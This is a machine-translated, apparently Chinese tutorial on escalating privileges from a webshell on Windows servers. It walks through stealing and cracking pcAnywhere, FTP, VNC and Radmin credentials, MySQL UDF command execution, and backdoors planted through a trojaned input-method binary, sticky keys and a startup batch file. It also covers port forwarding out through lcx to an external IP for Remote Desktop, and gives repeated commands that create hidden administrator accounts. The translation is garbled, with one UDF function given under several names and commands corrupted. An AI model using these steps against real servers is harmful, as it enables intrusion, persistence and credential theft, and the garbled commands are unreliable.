Introduction to common webshell elevation methods and webshell elevation

Introduction to common webshell elevation methods and webshell elevation

Permission escalation for pcAnywhere:

1. permission escalation using pcAnywhere is provided that pcAnywhere is installed to the default path by default, and its Directory Security permission has the users permission. If the Administrator deletes the directory permissions of users and power users, permission cannot be revoked if only the permissions of administer and system User Directories are left;

2. find the host directory in the pcanywhere directory in the webshll Trojan. The cif file contains the account and password used to connect to pcanywhere. then download the file and use the PcAnywhere password cracking tool to crack the password, then, install pcanywhere on your computer and connect to another computer for Remote Desktop Connection;

-----------

Privilege Escalation using HASH cracking:

1. Tools: ophcrack-win32-installer-3.3.0 (hash cracking software), Pwdump7 (view hash software), rainbow table (password dictionary)

2. Train of Thought: penetration. The Administrator may use the same password for several servers. We can try to log on after obtaining the other server.

Other servers

3. For example, add a user to the Administrator group: net user backlion 123456/add

Net localgroup administrators backlion/add

4. Run pwdump7 in dos to view the user's hash value: backlion: 1003: 2FB6717FC6897581AAD3B435B51404EE: da0rjd72f8d04983188ccd4ca257e44 :::

5. Crack the user through ophcrack and rainbow table

6. Prevention: if the password exceeds 14 characters, it cannot be cracked. We recommend that you set the password to 15 characters. The more complicated the password, the better.

----------------

MYSQL Privilege Escalation (udf. dll ):

1. The files used include the su. php Trojan and the Linx Mysql BackDoor. php Trojan.

1. default path of udf. dll: C: \ Winnt \ udf. dll (win2000 system), C: \ Windows \ udf. dll (win2003 System)

2. Find the mysql configuration file in the website directory, which is commonly used: config. php, web. php, webconfig. php

The configuration file is as follows:

$ Dbhost = 'localhost'; // the database server is 127.0.0.1.

$ Dbuser = 'root'; // database username

$ Dbpw = 'a'; // Database Password

$ Dbname = 'dz'; // Database Name

3. in su. in php, enter host: 127.0.0.1 user: root passwor: a db: mysql, and then enter the SQL command to add the user: select state ("net user backlion 123/add & net localgroup administrators backlion/add ")

Then, use the net user command to check whether the object has been added successfully.

4. in udf. in ph, host: 127.0.0.1 user: root passwor: a db: mysql, and enter the DLL export path: C: \ Windows \ udf. dll, enter the following command in the SQL command:

Create function Using shell returns string soname 'udf. dll '// Add a udf. dll component function

Select shortshell ('net user backlion $123456/add'); // add a user

Select external shell ('net localgroup administrators backlion $/add'); // add a user to the Administrator Group

Select export shell ('C: \ 3389.exe '); // put the 3389 file on the c drive, and then run

Drop function using shell; // delete a function

Select foreign shell ('netstat-any'); // This is to check the port opening status

------------------------

Chrasco privilege escalation:

1. Tools used: win2003 0dayholes 03.exeand cmd.exe;

2.then, upload 03.exeand cmd.exe to the readable directory in webshell, and switch to the readable directory. Then, enter our cmd.exe path in webshll.pdf, for example, c:/recyle/cmd.exe, and enter c: /recyle/03.exe "net user backlion 123/add & net localgroup adminstrators backlion/add"

-----------------------------

Privilege Escalation using sogouinput method (6.0:

1. The sogouinput method is version 6.0. Then, we use webshll Trojan management to find the path to install sogou, and then upload

ImeUtil.exe replaces the original ImeUtil.exe file. Once this program is loaded, the Administrator is automatically added to the system.

Username: sunwear password: sunwear

--------------------

Lcx Intranet port conversion prevents Remote Desktop logon on the Intranet:

1. The wscript component of the webshll target site is enabled and has a read/write Directory, which is generally uploaded to the c:/recyle directory.

2. Upload our cmd.exeand lcx.exe.

3. Enter c:/recyle/cmd.exe in the shll path and enter c:/recyle/lcx.exe slave 202.12.13.2 51 127.0.0.1 3389

4. Input: d:/lcx.exe listen 51 3333 in local DOS to listen to 51 and forward it to port 3333.

4. In the local Remote Desktop, enter 127.0.0.1: 3333.

---------------

6Gftp elevation:

1. default installation directory C: \ Program Files \ Gene6 FTP Server

2. The path for saving the password file is in C: \ Program Files \ Gene6 FTP Server \ RemoteAdmin \ Remote. ini.

The configuration file is as follows:

[Server]

IP = 127.0.0.1, 8021 \ r \ n // port number used

GrantAllAccessToLocalHost = 0

[Acct = Administrator] // User Name

Enabled = 1

Rights = 0

Password = 21232F297A57A5A743894A0E4A801FC3 // md5 Password

3. Check that the g6ftp software is installed in webshll. The default installation path is

4. Enter C: \ recycler \ lcx.exe-tran 8022 127.0.0.1 8021 in shll.

6. Install the 6gftp software locally. Enter the IP address of the target site. The port number is 8022, the user name is administrator, and the password is the cracked md5 value;

---------------

Serv-U6.4 to raise the right:

1. serv-u key: Keys + 1IGE9b4xDP0q2W + vE4vgZLA7unm6t3CxTI

2. Enter cmd/c net user backlion $123/add & net localgroup administrators backlion $/add in the commands below serv-u.

3. A user name is added.

4. You can use this account to log on to the Remote Desktop;

------------------

VNC password cracking and Elevation of Privilege:

1. Read the vnc registry key value in webshll: Registry path of RealVNC:

HKEY_LOCAL_MACHINE \ SOFTWARE \ RealVNC \ WinVNC4 \ Password

UltraVNC registry path:

HKEY_LOCAL_MACHINE \ SOFTWARE \ ORL \ WinVNC3 \ Default \ password

It reads the decimal number and needs to be converted to the hexadecimal format as follows:

Hexadecimal: D7 51 CC 73 31 24 7A 93

Decimal: 12 7C EF 6E 0B 7A D9

3. Crack the vnc password: vncpwdump.exe D751CC7331247A93

4. then install a VNC client locally for remote connection.

----------------------

Radmin privilege escalation:

1. Check that the Radmin program is installed in webshll;

2. Read the Radmin registry key value and convert the read decimal to hexadecimal;

3. directly use the radmi-hash tool to connect and enter the hexadecimal format for reading;

4. You can use the radmin client to connect to the client;

-----------------

360 Elevation of Privilege by security guard:

1. Upload cmd.exeand 360.exe to a readable directory, for example, c:/recyle.

2. Input c:/recyle/cmd.exe in shell and enter c:/recyle/360.exe sethc below

3. log on to the Remote Desktop and enter the target IP address. a dos window will pop up later. Then, you can add the user name and password.

---------------------------

Startup Item extraction:

1. Upload a batch file for adding users in webshll, for example, net user backlion $123456/add & net localgroup adminsitrators backlion $/add

The system was repaired. bat;

2. Then, in wegshll, enter the selected startup path: C: \ Documents and Settings \ Administrator \ Start Menu \ Program \ Start to upload our batch files;

3. As long as the administrator restarts the host next time, it will automatically add our account;